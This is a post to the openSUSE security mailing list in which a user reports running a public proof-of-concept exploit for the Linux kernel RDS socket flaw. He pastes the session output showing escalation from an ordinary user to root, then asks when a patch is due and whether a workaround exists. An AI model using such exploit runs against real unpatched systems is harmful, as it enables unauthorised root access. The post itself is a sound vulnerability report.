Hello, After reading about the RDS vulnerability identified by VSR Security http://www.zdnet.com/blog/security/linux-kernel-vulnerability-coughs-up-supe..., I tested this out for myself by compiling the proof of concept. Here is the output of the test: jfwright@linux-x0ou:~/Downloads> id uid=1000(jfwright) gid=100(users) groups=16(dialout),20(cdrom),33(video),100(users),1000(vboxusers) jfwright@linux-x0ou:~/Downloads> ./linux-rds-exploit [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved rds_proto_ops to 0xffffffffa0f5ee80 [+] Resolved rds_ioctl to 0xffffffffa0f57000 [+] Resolved commit_creds to 0xffffffff810785f0 [+] Resolved prepare_kernel_cred to 0xffffffff81078790 [*] Overwriting function pointer... [*] Triggering payload... [*] Restoring function pointer... [*] Got root! linux-x0ou:~/Downloads> id uid=0(root) gid=0(root) As you can see it works. I then updated the kernel to: Repository: @System Name: kernel-desktop Version: 2.6.34.7-0.4.1 Arch: x86_64 Vendor: openSUSE Installed: Yes Status: up-to-date I have at least a few and possibly many machines that will require a security fix. Is there a planned release date for a security patch, and is there a known work around to prevent this from being exploited? Thanks, James -- To unsubscribe, e-mail: opensuse-security+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-security+help@opensuse.org